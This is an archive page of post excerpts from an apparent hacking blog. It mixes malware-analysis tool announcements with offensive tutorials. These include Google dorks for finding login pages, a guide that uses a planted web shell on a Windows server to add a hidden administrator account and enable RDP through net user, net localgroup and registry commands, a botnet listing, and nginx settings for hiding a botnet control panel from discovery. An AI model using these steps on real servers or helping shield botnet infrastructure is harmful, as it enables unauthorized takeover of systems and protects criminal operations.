
Showing posts from December, 2014

[TUTORIAL] Advanced Google Searching

Advanced ways to search on google: Note that Google is case insensitive! you can use this to search for whatever you want! Want to find login urls? inurl:login inurl:login.php? perhaps search for pdf's with information from the FBI? filetype df Web Search allinanchor:, allintext:, allintitle:, allinurl:, cache:, define:, filetype:, id:, inanchor:, info:, intext:, intitle:, inurl:, link:, related:, site: Image Search allintitle:, allinurl:, filetype:, inurl:, intitle:, site: Groups allintext:, allintitle:, author:, group:, insubject:, intext:, intitle: Directory allintext:, allintitle:, allinurl:, ext:, filetype:, intext:, intitle:, inurl: News allintext:, allintitle:, allinurl:, intext:, intitle:, inurl:, location:, source: Product Search allintext:, allintitle: allinanchor: If you start your query with allinanchor:, Google restricts results to pages containing all query terms you specify in the anchor text on links to the page. For example, [ allinanchor: best ...

Get RDP from shell, [small private tut]

Today i am going to explain hot to get RDP from a shell (Notice:- The shell is uploaded on windows server and commands are executable on the shell) So here we start the tutorial (i)Execute this command on the shell " net user username password /add" Now you can use any username and password Step 2:- After executing this Command you added a user to the RDP. Now we need to add user as Administrator. Now to add user as administrators group Use this command and execute this in shell. "net localgroup administrators username /add" Step 3:- After execution try to connect with RDP by typing "mstsc" in "run" add username and pass then click connect and enjoy your RDP. Note:- If your RDP has static ip but doesnt connect on MSTSC then use these commands to allow remote users reg add "hklm\system\currentControlSet\Control\Termina l Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f reg add "hklm\system\currentControlSet\Control\T...

Tox Chat - A New Kind Of Instant Messaging

Tox Chat - Secure And Best Chat Server    A New Kind of Instant Messaging With the rise of government monitoring programs, Tox provides an easy to use application that allows you to connect with friends and family without anyone else listening in. While other big-name services require you to pay for features, Tox is totally free, and comes without advertising.   About Tox Nowadays, every government seems to be interested in what we're saying online. Tox is built on a "privacy goes first" agenda, and we make no compromises. Your safety is our top priority, and there isn't anything in the world that will change that.   Instant messaging, video conferencing, and more   Messages At your fingertips. You're always in the loop with instant encrypted messaging.   Calls Stay in touch. Make free and secure Tox to Tox calls.   Video Seeing is believing. Catch up face to face with a secure video call.   SITE :-   DOWNLOAD LINK :-...

Viper - A Binary Management And Analysis Framework

Viper - A binary management and analysis framework dedicated to malware and exploit researchers Viper is a binary analysis and management framework. Its fundamental objective is to provide a solution to easily organize your collection of malware and exploit samples as well as your collection of scripts you created or found over the time to facilitate your daily research. Think of it as a Metasploit for malware researchers: it provides a terminal interface that you can use to store, search and analyze arbitraty files with and a framework to easily create plugins of any sort. DOWNLOAD LINK :-

Damm - Differential Analysis Of Malware In Memory

An open source memory analysis tool built on top of Volatility. It is meant as a proving ground for interesting new techniques to be made available to the community. These techniques are an attempt to speed up the investigation process through data reduction and codifying some expert knowledge.   Features ~30 Volatility plugins combined into ~20 DAMM plugins (e.g., pslist, psxview and other elements are combined into a 'processes' plugin) Can run multiple plugins in one invocation The option to store plugin results in SQLite databases for preservation or for "cached" analysis A filtering/type system that allows easily filtering on attributes like pids to see all information related to some process and exact or partial matching for strings, etc. The ability to show the differences between two databases of results for the same or similar machines and manipulate from the cmdline how the differencing operates The ability to warn on certain types of suspicious behavior Out...

[Killtrojan Syslog] Tool To Detect Malware Activity On A System

Killtrojan Syslog is a free application to create a report about characteristics of the system to further analyze and look for signs of malware, also is intended to put the report in a specialized forum for users to help.   The tool has a very intuitive and easy to use for non-technical users to create their reports. Also useful for more advanced users who want to analyze a computer.   With the support logs with BBCode mode, you can paste the log generated in any forum (SMF, PHPBB, Invision ...) which will be detailed with clear colors for your reading.   DOWNLOAD LINK :-

Pyew - A Python Tool For Static Malware Analysis

Pyew is a (command line) python tool to analyse malware. It does have support for hexadecimal viewing, disassembly (Intel 16, 32 and 64 bits), PE and ELF file formats (it performs code analysis and let you write scripts using an API to perform many types of analysis), follows direct call/jmp instructions in the interactive command line, displays function names and string data references; supports OLE2 format, PDF format and more. It also supports plugins to add more features to the tool.   Pyew have been successfully used in big malware analysis systems since almost 2 years, processing thousand of files daily.    DOWNLOAD LINK :-

Blackout Botnet V2


Secure Your Botnet Panel Using Nginx Config

Hi All The example will be on CentOS.   Our security will be based on two simple things in nginx configuration: user-agent. php extension.   The idea is simple, it is :   To change the file extension of the gate ".php" into something else. in our tutorial, ".gte" will be taken as example.   Configure nginx to process the files ".gte" as ".php".   Lock all access (Get) to php files (and other extensions if we want) of our panel on a long user-agent (if user-agent is false return 404).   Nginx installation :   Configure Nginx :   nginx.conf (/etc/nginx/nginx.conf) : user nginx ; worker_processes 1 ; error_log / var / log / nginx / error . log warn ; pid / var / run / nginx . pid ; events { worker_connections 1024 ; } http { include / etc / nginx / mime . types ; default_type ap...